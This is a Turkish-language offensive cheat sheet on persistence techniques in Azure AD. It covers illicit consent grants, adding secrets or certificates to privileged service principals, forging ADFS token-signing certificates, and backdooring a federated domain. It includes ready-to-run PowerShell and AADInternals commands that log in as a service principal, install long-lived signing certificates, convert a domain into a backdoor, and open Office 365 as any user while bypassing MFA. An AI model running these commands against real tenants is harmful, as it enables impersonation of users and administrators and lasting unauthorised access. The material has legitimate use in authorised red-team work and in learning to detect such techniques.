Az - Persistence

Yasadışı Onay Verme

Varsayılan olarak, herhangi bir kullanıcı Azure AD'de bir uygulama kaydedebilir. Bu nedenle, hedef kiracı için yüksek etki izinlere ihtiyaç duyan bir uygulama kaydedebilirsiniz ve yönetici onayıyla (eğer yöneticiyseniz onaylayabilirsiniz) - kullanıcının adına posta gönderme, rol yönetimi vb. gibi. Bu, başarılı bir durumda çok verimli olacak bir şekilde saldırıları gerçekleştirmemizi sağlar.

Ayrıca, uygulamayı kendi kullanıcınızla kabul ederek üzerinde erişimi sürdürmek de mümkündür.

Uygulamalar ve Hizmet İlkeleri

Uygulama Yöneticisi, GA veya microsoft.directory/applications/credentials/update izinlerine sahip özel bir rol ile mevcut bir uygulamaya kimlik bilgileri (gizli veya sertifika) ekleyebiliriz.

Yüksek izinlere sahip bir uygulamayı hedef almak veya yüksek izinlere sahip bir yeni bir uygulama eklemek mümkündür.

Uygulamaya eklemek için ilginç bir rol, Ayrıcalıklı kimlik doğrulama yöneticisi rolü olabilir, çünkü Global Yöneticilerin şifresini sıfırlama izni verir.

Bu teknik ayrıca MFA'yı atlamaya olanak sağlar.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Sertifika tabanlı kimlik doğrulama için

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federasyon - Token İmzalama Sertifikası

On-prem AD'de DA yetkileriyle, çok uzun bir geçerlilik süresine sahip yeni Token imzalama ve Token Şifreleme sertifikaları oluşturmak ve bunları içe aktarmak mümkündür. Bu, ImuutableID'sini bildiğimiz herhangi bir kullanıcı olarak giriş yapmamıza olanak sağlayacaktır.

Aşağıdaki komutu ADFS sunucusunda DA olarak çalıştırın yeni sertifikalar oluşturmak için (varsayılan şifre 'AADInternals'), bunları ADFS'e ekleyin, otomatik yenilemeyi devre dışı bırakın ve hizmeti yeniden başlatın:

New-AADIntADFSSelfSignedCertificates

Ardından, Azure AD ile sertifika bilgilerini güncelleyin:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federasyon - Güvenilen Etki Alanı

Bir kiracıda GA yetkileriyle, yeni bir etki alanı eklemek (doğrulanmış olmalıdır) mümkündür, kimlik doğrulama türünü Federasyon olarak yapılandırmak ve etki alanını belirli bir sertifikaya (aşağıdaki komutta any.sts) ve yayıncıya güvenmek için yapılandırmak mümkündür:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Referanslar

• https://aadinternalsbackdoor.azurewebsites.net/